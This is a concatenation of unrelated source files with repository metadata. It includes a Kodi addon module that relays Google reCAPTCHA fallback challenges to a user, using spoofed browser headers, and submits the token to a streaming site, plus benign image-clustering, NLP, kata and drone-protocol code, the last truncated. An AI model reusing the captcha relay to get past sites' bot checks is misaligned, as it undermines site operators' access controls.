self.ctrlBackgound = xbmcgui.ControlImage(
0,0,
1280, 720,
bg_image
)
self.cancelled=False
self.addControl (self.ctrlBackgound)
self.msg = kwargs.get('msg')+'\nNormally there are 3-4 selections and 2 rounds of pictures'
self.round=kwargs.get('round')
self.strActionInfo = xbmcgui.ControlLabel(335, 120, 700, 300, self.msg, 'font13', '0xFFFF00FF')
self.addControl(self.strActionInfo)
self.strActionInfo = xbmcgui.ControlLabel(335, 20, 724, 400, 'Captcha round %s'%(str(self.round)), 'font40', '0xFFFF00FF')
self.addControl(self.strActionInfo)
self.cptloc = kwargs.get('captcha')
#self.img = xbmcgui.ControlImage(335,200,624,400,self.cptloc)
imgw=400
imgh=300
imgX=335
imgY=200
pw=imgw/3
ph=imgh/3
self.img = xbmcgui.ControlImage(imgX,imgY,imgw,imgh,self.cptloc)
self.addControl(self.img)
self.chk=[0]*9
self.chkbutton=[0]*9
self.chkstate=[False]*9
#self.chk[0] = xbmcgui.ControlCheckMark(335,200,200,200,'select',checkWidth=30, checkHeight=30)
self.chk[0]= xbmcgui.ControlImage(imgX,imgY, pw, ph,check_image)# '', font='font1',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[1]= xbmcgui.ControlImage(imgX+pw,imgY, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[2]= xbmcgui.ControlImage(imgX+pw+pw,imgY, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[3]= xbmcgui.ControlImage(imgX,imgY+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[4]= xbmcgui.ControlImage(imgX+pw,imgY+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[5]= xbmcgui.ControlImage(imgX+pw+pw,imgY+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[6]= xbmcgui.ControlImage(imgX,imgY+ph+ph, pw, ph,check_image)#, '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[7]= xbmcgui.ControlImage(imgX+pw,imgY+ph+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[8]= xbmcgui.ControlImage(imgX+pw+pw,imgY+ph+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chkbutton[0]= xbmcgui.ControlButton(imgX,imgY, pw, ph, '1', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[1]= xbmcgui.ControlButton(imgX+pw,imgY, pw, ph, '2', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[2]= xbmcgui.ControlButton(imgX+pw+pw,imgY, pw, ph, '3', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[3]= xbmcgui.ControlButton(imgX,imgY+ph, pw, ph, '4', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[4]= xbmcgui.ControlButton(imgX+pw,imgY+ph, pw, ph, '5', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[5]= xbmcgui.ControlButton(imgX+pw+pw,imgY+ph, pw, ph, '6', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[6]= xbmcgui.ControlButton(imgX,imgY+ph+ph, pw, ph, '7', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[7]= xbmcgui.ControlButton(imgX+pw,imgY+ph+ph, pw, ph, '8', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[8]= xbmcgui.ControlButton(imgX+pw+pw,imgY+ph+ph, pw, ph, '9', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
for obj in self.chk:
self.addControl(obj )
obj.setVisible(False)
for obj in self.chkbutton:
self.addControl(obj )
#self.chk[0].setSelected(False)
self.cancelbutton = xbmcgui.ControlButton(imgX+(imgw/2)-110,imgY+imgh+10,100,40,'Cancel',alignment=2)
self.okbutton = xbmcgui.ControlButton(imgX+(imgw/2)+10,imgY+imgh+10,100,40,'OK',alignment=2)
self.addControl(self.okbutton)
self.addControl(self.cancelbutton)
self.chkbutton[6].controlDown(self.cancelbutton); self.chkbutton[6].controlUp(self.chkbutton[3])
self.chkbutton[7].controlDown(self.cancelbutton); self.chkbutton[7].controlUp(self.chkbutton[4])
self.chkbutton[8].controlDown(self.okbutton); self.chkbutton[8].controlUp(self.chkbutton[5])
self.chkbutton[6].controlLeft(self.chkbutton[8]);self.chkbutton[6].controlRight(self.chkbutton[7]);
self.chkbutton[7].controlLeft(self.chkbutton[6]);self.chkbutton[7].controlRight(self.chkbutton[8]);
self.chkbutton[8].controlLeft(self.chkbutton[7]);self.chkbutton[8].controlRight(self.chkbutton[6]);
self.chkbutton[3].controlDown(self.chkbutton[6]); self.chkbutton[3].controlUp(self.chkbutton[0])
self.chkbutton[4].controlDown(self.chkbutton[7]); self.chkbutton[4].controlUp(self.chkbutton[1])
self.chkbutton[5].controlDown(self.chkbutton[8]); self.chkbutton[5].controlUp(self.chkbutton[2])
self.chkbutton[3].controlLeft(self.chkbutton[5]);self.chkbutton[3].controlRight(self.chkbutton[4]);
self.chkbutton[4].controlLeft(self.chkbutton[3]);self.chkbutton[4].controlRight(self.chkbutton[5]);
self.chkbutton[5].controlLeft(self.chkbutton[4]);self.chkbutton[5].controlRight(self.chkbutton[3]);
self.chkbutton[0].controlDown(self.chkbutton[3]); self.chkbutton[0].controlUp(self.cancelbutton)
self.chkbutton[1].controlDown(self.chkbutton[4]); self.chkbutton[1].controlUp(self.cancelbutton)
self.chkbutton[2].controlDown(self.chkbutton[5]); self.chkbutton[2].controlUp(self.okbutton)
self.chkbutton[0].controlLeft(self.chkbutton[2]);self.chkbutton[0].controlRight(self.chkbutton[1]);
self.chkbutton[1].controlLeft(self.chkbutton[0]);self.chkbutton[1].controlRight(self.chkbutton[2]);
self.chkbutton[2].controlLeft(self.chkbutton[1]);self.chkbutton[2].controlRight(self.chkbutton[0]);
self.cancelled=False
self.setFocus(self.okbutton)
self.okbutton.controlLeft(self.cancelbutton);self.okbutton.controlRight(self.cancelbutton);
self.cancelbutton.controlLeft(self.okbutton); self.cancelbutton.controlRight(self.okbutton);
self.okbutton.controlDown(self.chkbutton[2]);self.okbutton.controlUp(self.chkbutton[8]);
self.cancelbutton.controlDown(self.chkbutton[0]); self.cancelbutton.controlUp(self.chkbutton[6]);
#self.kbd = xbmc.Keyboard()
def get(self):
self.doModal()
#self.kbd.doModal()
#if (self.kbd.isConfirmed()):
# text = self.kbd.getText()
# self.close()
# return text
#xbmc.sleep(5000)
self.close()
if not self.cancelled:
retval=""
for objn in range(9):
if self.chkstate[objn]:#self.chk[objn].getSelected() :
retval+=("" if retval=="" else ",")+str(objn)
return retval
else:
return ""
# def onControl(self,control):
# if control == self.okbutton:
# self.close()
# elif control == self.cancelbutton:
# self.cancelled=True
# self.close()
def anythingChecked(self):
for obj in self.chkstate:
if obj:#obj.getSelected():
return True
return False
def onControl(self,control):
if control==self.okbutton:
if self.anythingChecked():
self.close()
elif control== self.cancelbutton:
self.cancelled=True
self.close()
try:
#print control
if 'xbmcgui.ControlButton' in repr(type(control)):
index=control.getLabel()
#print 'index',index
if index.isnumeric():
#print 'index2',index
#self.chk[int(index)-1].setSelected(not self.chk[int(index)-1].getSelected())
self.chkstate[int(index)-1]= not self.chkstate[int(index)-1]
self.chk[int(index)-1].setVisible(self.chkstate[int(index)-1])
#print 'ddone'
except: pass
# def onClick(self, controlId):
# print 'CLICKED',controlId
def onAction(self, action):
if action == 10:#ACTION_PREVIOUS_MENU:
self.cancelled=True
self.close()
def getUrl(url, cookieJar=None,post=None, timeout=20, headers=None, noredir=False):
cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
if noredir:
opener = urllib2.build_opener(NoRedirection,cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
else:
opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
#opener = urllib2.install_opener(opener)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, lmagellan Gecko) Chrome/33.0.1750.154 Safari/537.36')
if headers:
for h,hv in headers:
req.add_header(h,hv)
response = opener.open(req,post,timeout=timeout)
link=response.read()
response.close()
return link;
class UnCaptchaReCaptcha:
def processCaptcha(self, key,lang):
headers=[("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"),
("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
("Referer", "https://www.google.com/recaptcha/api2/demo"),
("Accept-Language", lang)];
html=getUrl("http://www.google.com/recaptcha/api/fallback?k=" + key,headers=headers);
token=""
round=0
while True:
payload = re.findall("\"(/recaptcha/api2/payload[^\"]+)",html);
round+=1
message =re.findall("<label .*?class=\"fbc-imageselect-message-text\">(.*?)</label>",html);
if len(message)==0:
message =re.findall("<div .*?class=\"fbc-imageselect-message-error\">(.*?)</div>",html)
if len(message)==0:
token = re.findall("\"this\\.select\\(\\)\">(.*?)</textarea>",html)[0];
if not token=="":
line1 = "Captcha Sucessfull"
xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%('LSPro',line1, 3000, None))
else:
line1 = "Captcha failed"
xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%('LSPro',line1, 3000, None))
break
else:
message=message[0]
payload=payload[0]
imgurl=re.findall("name=\"c\"\\s+value=\\s*\"([^\"]+)",html)[0]
headers=[("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"),
("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
("Referer", "http://www.google.com/recaptcha/api/fallback?k=" + key),
("Accept-Language", lang)];
cval=re.findall('name="c" value="(.*?)"',html)[0]
captcha_imgurl = "https://www.google.com"+payload.replace('&','&')
#print message
message=message.replace('<strong>','')
message=message.replace('</strong>','')
#captcha_response=raw_input('-->')
oSolver = cInputWindow(captcha = captcha_imgurl,msg = message,round=round)
captcha_response = oSolver.get()
#print 'captcha_response',captcha_response
if captcha_response=="":
break
responses=""
for rr in captcha_response.split(','):
responses += "&response=" + rr;
html = getUrl("http://www.google.com/recaptcha/api/fallback?k="+key
,post=urllib.urlencode({'c' : cval,})+responses,headers=headers)#.decode('unicode-escape')
#print html
return token
def performCaptcha(sitename,cj,returnpage=True,captcharegex='data-sitekey="(.*?)"',lang="en",headers=None):
sitepage=getUrl(sitename,cookieJar=cj,headers=headers)
sitekey=re.findall(captcharegex,sitepage)
token=""
if len(sitekey)>=1:
c=UnCaptchaReCaptcha()
token=c.processCaptcha(sitekey[0],lang)
if returnpage:
if headers==None:
headers=[("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"),
("Referer", sitename)];
else:
headers+=[("Referer", sitename)]
sitepage=getUrl(sitename,cookieJar=cj,post=urllib.urlencode({"g-recaptcha-response":token}),headers=headers)
if returnpage:
return sitepage
else:
return token
#cookieJar = cookielib.LWPCookieJar()
#performCaptcha("http://www.livetv.tn/",cookieJar);
|
mrquim/mrquimrepo
|
repo/plugin.video.live.magellan/unCaptcha.py
|
Python
|
gpl-2.0
| 14,966 | 0.029467 |
# Auto-clustering, suggested by Matt Terry
from skimage import io, color, exposure
from sklearn import cluster, preprocessing
import numpy as np
import matplotlib.pyplot as plt
url = 'http://blogs.mathworks.com/images/steve/2010/mms.jpg'
import os
if not os.path.exists('mm.jpg'):
print("Downloading M&M's...")
from urllib.request import urlretrieve
urlretrieve(url, 'mm.jpg')
print("Image I/O...")
mm = io.imread('mm.jpg')
mm_lab = color.rgb2lab(mm)
ab = mm_lab[..., 1:]
print("Mini-batch K-means...")
X = ab.reshape(-1, 2)
kmeans = cluster.MiniBatchKMeans(n_clusters=6)
y = kmeans.fit(X).labels_
labels = y.reshape(mm.shape[:2])
N = labels.max()
def no_ticks(ax):
ax.set_xticks([])
ax.set_yticks([])
# Display all clusters
for i in range(N):
mask = (labels == i)
mm_cluster = mm_lab.copy()
mm_cluster[..., 1:][~mask] = 0
ax = plt.subplot2grid((2, N), (1, i))
ax.imshow(color.lab2rgb(mm_cluster))
no_ticks(ax)
ax = plt.subplot2grid((2, N), (0, 0), colspan=2)
ax.imshow(mm)
no_ticks(ax)
# Display histogram
L, a, b = mm_lab.T
left, right = -100, 100
bins = np.arange(left, right)
H, x_edges, y_edges = np.histogram2d(a.flatten(), b.flatten(), bins,
normed=True)
ax = plt.subplot2grid((2, N), (0, 2))
H_bright = exposure.rescale_intensity(H, in_range=(0, 5e-4))
ax.imshow(H_bright,
extent=[left, right, right, left], cmap=plt.cm.gray)
ax.set_title('Histogram')
ax.set_xlabel('b')
ax.set_ylabel('a')
# Voronoi diagram
mid_bins = bins[:-1] + 0.5
L = len(mid_bins)
yy, xx = np.meshgrid(mid_bins, mid_bins)
Z = kmeans.predict(np.column_stack([xx.ravel(), yy.ravel()]))
Z = Z.reshape((L, L))
ax = plt.subplot2grid((2, N), (0, 3))
ax.imshow(Z, interpolation='nearest',
extent=[left, right, right, left],
cmap=plt.cm.Spectral, alpha=0.8)
ax.imshow(H_bright, alpha=0.2,
extent=[left, right, right, left],
cmap=plt.cm.gray)
ax.set_title('Clustered histogram')
no_ticks(ax)
plt.show()
|
scikit-image/skimage-demos
|
mm_color_cluster.py
|
Python
|
bsd-3-clause
| 2,030 | 0.000985 |
from allennlp.modules.encoder_base import _EncoderBase
from allennlp.common import Registrable
class Seq2VecEncoder(_EncoderBase, Registrable):
"""
A `Seq2VecEncoder` is a `Module` that takes as input a sequence of vectors and returns a
single vector. Input shape : `(batch_size, sequence_length, input_dim)`; output shape:
`(batch_size, output_dim)`.
We add two methods to the basic `Module` API: `get_input_dim()` and `get_output_dim()`.
You might need this if you want to construct a `Linear` layer using the output of this encoder,
or to raise sensible errors for mis-matching input dimensions.
"""
def get_input_dim(self) -> int:
"""
Returns the dimension of the vector input for each element in the sequence input
to a `Seq2VecEncoder`. This is `not` the shape of the input tensor, but the
last element of that shape.
"""
raise NotImplementedError
def get_output_dim(self) -> int:
"""
Returns the dimension of the final vector output by this `Seq2VecEncoder`. This is `not`
the shape of the returned tensor, but the last element of that shape.
"""
raise NotImplementedError
|
allenai/allennlp
|
allennlp/modules/seq2vec_encoders/seq2vec_encoder.py
|
Python
|
apache-2.0
| 1,215 | 0.005761 |
from .main import main
# run the program
if __name__ == '__main__':
main()
|
william-fiset/Survival
|
__init__.py
|
Python
|
apache-2.0
| 79 | 0.012658 |
def sum_diagonal_principal(matrix):
return sum(matrix[i][i] for i in range(len(matrix)))
def sum_diagonal_secondary(matrix):
return sum(matrix[i][-i-1] for i in range(len(matrix)))
def diagonal(matrix):
s1 = sum_diagonal_principal(matrix)
s2 = sum_diagonal_secondary(matrix)
return "Principal Diagonal win!" if s1 > s2 else "Secondary Diagonal win!" if s1 < s2 else "Draw!"
|
SelvorWhim/competitive
|
Codewars/PrincipalDiagonalVsSecondaryDiagonal.py
|
Python
|
unlicense
| 396 | 0.007576 |
AUTH_URL = "https://quality.hubwoo.com/rest/auth/latest/session"
|
AlexWPerfComm/Python-JIRA
|
const/Constants.py
|
Python
|
mit
| 65 | 0 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
author: Alex Apostoli
based on https://github.com/hkm95/python-multiwii
which is under GPLv3
"""
import struct
import time
import sys
import re
class MSPItem:
def __init__(self, name, fmt, fields):
self.name = name
self.format = fmt
self.fields = fields
if not isinstance(self.format, list):
self.format = [self.format]
self.fields = [self.fields]
self.values = {}
def parse(self, msp, dataSize):
'''parse data'''
ofs = msp.p
for i in range(len(self.format)):
fmt = self.format[i]
fields = self.fields[i].split(',')
if fmt[0] == '{':
# we have a repeat count from an earlier variable
right = fmt.find('}')
vname = fmt[1:right]
count = self.values[vname]
fmt = "%u%s" % (count, fmt[right+1:])
if fmt[0].isdigit():
repeat = int(re.search(r'\d+', fmt).group())
else:
repeat = None
fmt = "<" + fmt
fmt_size = struct.calcsize(fmt)
if dataSize < fmt_size:
raise Exception("Format %s needs %u bytes got %u for %s" % (self.name, fmt_size, dataSize, fmt))
values = list(struct.unpack(fmt, msp.inBuf[ofs:ofs+fmt_size]))
if repeat is not None:
for i in range(len(fields)):
self.values[fields[i]] = []
for j in range(repeat):
self.values[fields[i]].append(values[j*len(fields)])
else:
for i in range(len(fields)):
self.values[fields[i]] = values[i]
dataSize -= fmt_size
ofs += fmt_size
msp.by_name[self.name] = self
#print("Got %s" % self.name)
class PyMSP:
""" Multiwii Serial Protocol """
OSD_RSSI_VALUE = 0
OSD_MAIN_BATT_VOLTAGE = 1
OSD_CROSSHAIRS = 2
OSD_ARTIFICIAL_HORIZON = 3
OSD_HORIZON_SIDEBARS = 4
OSD_ITEM_TIMER_1 = 5
OSD_ITEM_TIMER_2 = 6
OSD_FLYMODE = 7
OSD_CRAFT_NAME = 8
OSD_THROTTLE_POS = 9
OSD_VTX_CHANNEL = 10
OSD_CURRENT_DRAW = 11
OSD_MAH_DRAWN = 12
OSD_GPS_SPEED = 13
OSD_GPS_SATS = 14
OSD_ALTITUDE = 15
OSD_ROLL_PIDS = 16
OSD_PITCH_PIDS = 17
OSD_YAW_PIDS = 18
OSD_POWER = 19
OSD_PIDRATE_PROFILE = 20
OSD_WARNINGS = 21
OSD_AVG_CELL_VOLTAGE = 22
OSD_GPS_LON = 23
OSD_GPS_LAT = 24
OSD_DEBUG = 25
OSD_PITCH_ANGLE = 26
OSD_ROLL_ANGLE = 27
OSD_MAIN_BATT_USAGE = 28
OSD_DISARMED = 29
OSD_HOME_DIR = 30
OSD_HOME_DIST = 31
OSD_NUMERICAL_HEADING = 32
OSD_NUMERICAL_VARIO = 33
OSD_COMPASS_BAR = 34
OSD_ESC_TMP = 35
OSD_ESC_RPM = 36
OSD_REMAINING_TIME_ESTIMATE = 37
OSD_RTC_DATETIME = 38
OSD_ADJUSTMENT_RANGE = 39
OSD_CORE_TEMPERATURE = 40
OSD_ANTI_GRAVITY = 41
OSD_G_FORCE = 42
OSD_MOTOR_DIAG = 43
OSD_LOG_STATUS = 44
OSD_FLIP_ARROW = 45
OSD_LINK_QUALITY = 46
OSD_FLIGHT_DIST = 47
OSD_STICK_OVERLAY_LEFT = 48
OSD_STICK_OVERLAY_RIGHT = 49
OSD_DISPLAY_NAME = 50
OSD_ESC_RPM_FREQ = 51
OSD_RATE_PROFILE_NAME = 52
OSD_PID_PROFILE_NAME = 53
OSD_PROFILE_NAME = 54
OSD_RSSI_DBM_VALUE = 55
OSD_RC_CHANNELS = 56
OSD_CAMERA_FRAME = 57
MSP_NAME =10
MSP_OSD_CONFIG =84
MSP_IDENT =100
MSP_STATUS =101
MSP_RAW_IMU =102
MSP_SERVO =103
MSP_MOTOR =104
MSP_RC =105
MSP_RAW_GPS =106
MSP_COMP_GPS =107
MSP_ATTITUDE =108
MSP_ALTITUDE =109
MSP_ANALOG =110
MSP_RC_TUNING =111
MSP_PID =112
MSP_BOX =113
MSP_MISC =114
MSP_MOTOR_PINS =115
MSP_BOXNAMES =116
MSP_PIDNAMES =117
MSP_WP =118
MSP_BOXIDS =119
MSP_SERVO_CONF =120
MSP_NAV_STATUS =121
MSP_NAV_CONFIG =122
MSP_MOTOR_3D_CONFIG =124
MSP_RC_DEADBAND =125
MSP_SENSOR_ALIGNMENT =126
MSP_LED_STRIP_MODECOLOR =127
MSP_VOLTAGE_METERS =128
MSP_CURRENT_METERS =129
MSP_BATTERY_STATE =130
MSP_MOTOR_CONFIG =131
MSP_GPS_CONFIG =132
MSP_COMPASS_CONFIG =133
MSP_ESC_SENSOR_DATA =134
MSP_GPS_RESCUE =135
MSP_GPS_RESCUE_PIDS =136
MSP_VTXTABLE_BAND =137
MSP_VTXTABLE_POWERLEVEL =138
MSP_MOTOR_TELEMETRY =139
MSP_SET_RAW_RC =200
MSP_SET_RAW_GPS =201
MSP_SET_PID =202
MSP_SET_BOX =203
MSP_SET_RC_TUNING =204
MSP_ACC_CALIBRATION =205
MSP_MAG_CALIBRATION =206
MSP_SET_MISC =207
MSP_RESET_CONF =208
MSP_SET_WP =209
MSP_SELECT_SETTING =210
MSP_SET_HEAD =211
MSP_SET_SERVO_CONF =212
MSP_SET_MOTOR =214
MSP_SET_NAV_CONFIG =215
MSP_SET_MOTOR_3D_CONFIG =217
MSP_SET_RC_DEADBAND =218
MSP_SET_RESET_CURR_PID =219
MSP_SET_SENSOR_ALIGNMENT =220
MSP_SET_LED_STRIP_MODECOLOR=221
MSP_SET_MOTOR_CONFIG =222
MSP_SET_GPS_CONFIG =223
MSP_SET_COMPASS_CONFIG =224
MSP_SET_GPS_RESCUE =225
MSP_SET_GPS_RESCUE_PIDS =226
MSP_SET_VTXTABLE_BAND =227
MSP_SET_VTXTABLE_POWERLEVEL=228
MSP_BIND =241
MSP_RTC =247
MSP_EEPROM_WRITE =250
MSP_DEBUGMSG =253
MSP_DEBUG =254
IDLE = 0
HEADER_START = 1
HEADER_M = 2
HEADER_ARROW = 3
HEADER_SIZE = 4
HEADER_CMD = 5
HEADER_ERR = 6
PIDITEMS = 10
MESSAGES = {
MSP_RAW_GPS: MSPItem('RAW_GPS', "BBiihH", "fix,numSat,Lat,Lon,Alt,Speed"),
MSP_IDENT: MSPItem('IDENT', "BBBI", "version,multiType,MSPVersion,multiCapability"),
MSP_STATUS: MSPItem('STATUS', "HHHI", "cycleTime,i2cError,present,mode"),
MSP_RAW_IMU: MSPItem('RAW_IMU', "hhhhhhhhh", "AccX,AccY,AccZ,GyrX,GyrY,GyrZ,MagX,MagY,MagZ"),
MSP_SERVO: MSPItem('SERVO', "8h", "servo"),
MSP_MOTOR: MSPItem('MOTOR', "8h", "motor"),
MSP_RC: MSPItem('RC', "8h", "rc"),
MSP_COMP_GPS: MSPItem('COMP_GPS', "HhB", "distanceToHome,directionToHome,update"),
MSP_ATTITUDE: MSPItem('ATTITUDE', "hhh", "roll,pitch,yaw"),
MSP_ALTITUDE: MSPItem('ALTITUDE', "ih", "alt,vspeed"),
MSP_RC_TUNING: MSPItem('RC_TUNING', "BBBBBBB", "RC_Rate,RC_Expo,RollPitchRate,YawRate,DynThrPID,ThrottleMID,ThrottleExpo"),
MSP_BATTERY_STATE: MSPItem('BATTERY_STATE', "BHBHh", "cellCount,capacity,voltage,mah,current"),
MSP_RTC: MSPItem('RTC', "HBBBBBH", "year,mon,mday,hour,min,sec,millis"),
MSP_OSD_CONFIG: MSPItem("OSD_CONFIG",
["BBBBHBBH",
"{osd_item_count}H",
"B", "{stats_item_count}H",
"B", "{timer_count}H",
"HBIBBB"],
["feature,video_system,units,rssi_alarm,cap_alarm,unused1,osd_item_count,alt_alarm",
"osd_items",
"stats_item_count", "stats_items",
"timer_count", "timer_items",
"legacy_warnings,warnings_count,enabled_warnings,profiles,selected_profile,osd_overlay"]),
MSP_PID: MSPItem("PID", "8PID", "P,I,D"),
MSP_MISC: MSPItem("MISC", "HHHHHII","intPowerTrigger,conf1,conf2,conf3,conf4,conf5,conf6"),
MSP_MOTOR_PINS: MSPItem("MOTOR_PINS", "8H","MP"),
MSP_ANALOG: MSPItem("ANALOG", "BHHHH", "dV,consumed_mah,rssi,current,volt"),
MSP_STATUS: MSPItem("STATUS", "HHHIBHHBBIB", "task_delta,i2c_err_count,sensor_status,mode_flags,nop_1,system_load,gyro_time,nop_2,nop_3,armed,extra"),
}
def __init__(self):
self.msp_name = {
'name':None
}
self.msp_osd_config = {}
self.inBuf = bytearray([0] * 255)
self.p = 0
self.c_state = self.IDLE
self.err_rcvd = False
self.checksum = 0
self.cmd = 0
self.offset=0
self.dataSize=0
self.servo = []
self.mot = []
self.RCChan = []
self.byteP = []
self.byteI = []
self.byteD = []
self.confINF = []
self.byteMP = []
self.confP = []
self.confI = []
self.confD = []
# parsed messages, indexed by name
self.by_name = {}
def get(self, fieldname):
'''get a field from a parsed message by Message.Field name'''
a = fieldname.split('.')
msgName = a[0]
fieldName = a[1]
if not msgName in self.by_name:
# default to zero for simplicty of display
return 0
msg = self.by_name[msgName]
if not fieldName in msg.values:
raise Exception("Unknown field %s" % fieldName)
return msg.values[fieldName]
def read32(self):
'''signed 32 bit number'''
value, = struct.unpack("<i", self.inBuf[self.p:self.p+4])
self.p += 4
return value
def read32u(self):
'''unsigned 32 bit number'''
value, = struct.unpack("<I", self.inBuf[self.p:self.p+4])
self.p += 4
return value
def read16(self):
'''signed 16 bit number'''
value, = struct.unpack("<h", self.inBuf[self.p:self.p+2])
self.p += 2
return value
def read16u(self):
'''unsigned 16 bit number'''
value, = struct.unpack("<H", self.inBuf[self.p:self.p+2])
self.p += 2
return value
def read8(self):
'''unsigned 8 bit number'''
value, = struct.unpack("<B", self.inBuf[self.p:self.p+1])
self.p += 1
return value
def requestMSP (self, msp, payload = [], payloadinbytes = False):
if msp < 0:
return 0
checksum = 0
bf = ['$', 'M', '<']
pl_size = 2 * ((len(payload)) & 0xFF)
bf.append(pl_size)
checksum ^= (pl_size&0xFF)
bf.append(msp&0xFF)
checksum ^= (msp&0xFF)
if payload > 0:
if (payloadinbytes == False):
for c in struct.pack('<%dh' % ((pl_size) / 2), *payload):
checksum ^= (ord(c) & 0xFF)
else:
for c in struct.pack('<%Bh' % ((pl_size) / 2), *payload):
checksum ^= (ord(c) & 0xFF)
bf = bf + payload
bf.append(checksum)
return bf
def evaluateCommand(self, cmd, dataSize):
if cmd in self.MESSAGES:
# most messages are parsed from the MESSAGES list
self.MESSAGES[cmd].parse(self, dataSize)
elif cmd == self.MSP_NAME:
s = bytearray()
for i in range(0,dataSize,1):
b = self.read8()
if b == 0:
break
s.append(b)
self.msp_name['name'] = s.decode("utf-8")
elif cmd == self.MSP_ACC_CALIBRATION:
x = None
elif cmd == self.MSP_MAG_CALIBRATION:
x = None
elif cmd == self.MSP_BOX:
x = None
elif cmd == self.MSP_BOXNAMES:
x = None
elif cmd == self.MSP_PIDNAMES:
x = None
elif cmd == self.MSP_SERVO_CONF:
x = None
elif cmd == self.MSP_DEBUGMSG:
x = None
elif cmd == self.MSP_DEBUG:
x = None
else:
print("Unhandled command ", cmd, dataSize)
def parseMspData(self, buf):
for c in buf:
self.parseMspByte(c)
def parseMspByte(self, c):
if sys.version_info.major >= 3:
cc = chr(c)
ci = c
else:
cc = c
ci = ord(c)
if self.c_state == self.IDLE:
if cc == '$':
self.c_state = self.HEADER_START
else:
self.c_state = self.IDLE
elif self.c_state == self.HEADER_START:
if cc == 'M':
self.c_state = self.HEADER_M
else:
self.c_state = self.IDLE
elif self.c_state == self.HEADER_M:
if cc == '>':
self.c_state = self.HEADER_ARROW
elif cc == '!':
self.c_state = self.HEADER_ERR
else:
self.c_state = self.IDLE
elif self.c_state == self.HEADER_ARROW or self.c_state == self.HEADER_ERR:
self.err_rcvd = (self.c_state == self.HEADER_ERR)
#print (struct.unpack('<B',c)[0])
self.dataSize = ci
# reset index variables
self.p = 0
self.offset = 0
self.checksum = 0
self.checksum ^= ci
# the command is to follow
self.c_state = self.HEADER_SIZE
elif self.c_state == self.HEADER_SIZE:
#print (struct.unpack('<B',c)[0])
self.cmd = ci
self.checksum ^= ci
self.c_state = self.HEADER_CMD
elif self.c_state == self.HEADER_CMD and self.offset < self.dataSize:
#print (struct.unpack('<B',c)[0])
self.checksum ^= ci
self.inBuf[self.offset] = ci
self.offset += 1
elif self.c_state == self.HEADER_CMD and self.offset >= self.dataSize:
# compare calculated and transferred checksum
if ((self.checksum&0xFF) == ci):
if self.err_rcvd:
print("Vehicle didn't understand the request type")
else:
self.evaluateCommand(self.cmd, self.dataSize)
else:
print('"invalid checksum for command "+((int)(cmd&0xFF))+": "+(checksum&0xFF)+" expected, got "+(int)(c&0xFF))')
self.c_state = self.IDLE
def setPID(self):
self.sendRequestMSP(self.requestMSP(self.MSP_PID))
self.receiveData(self.MSP_PID)
time.sleep(0.04)
payload = []
for i in range(0, self.PIDITEMS, 1):
self.byteP[i] = int((round(self.confP[i] * 10)))
self.byteI[i] = int((round(self.confI[i] * 1000)))
self.byteD[i] = int((round(self.confD[i])))
# POS - 4 POSR - 5 NAVR - 6
self.byteP[4] = int((round(self.confP[4] * 100.0)))
self.byteI[4] = int((round(self.confI[4] * 100.0)))
self.byteP[5] = int((round(self.confP[5] * 10.0)))
self.byteI[5] = int((round(self.confI[5] * 100.0)))
self.byteD[5] = int((round(self.confD[5] * 10000.0))) / 10
self.byteP[6] = int((round(self.confP[6] * 10.0)))
self.byteI[6] = int((round(self.confI[6] * 100.0)))
self.byteD[6] = int((round(self.confD[6] * 10000.0))) / 10
for i in range(0, self.PIDITEMS, 1):
payload.append(self.byteP[i])
payload.append(self.byteI[i])
payload.append(self.byteD[i])
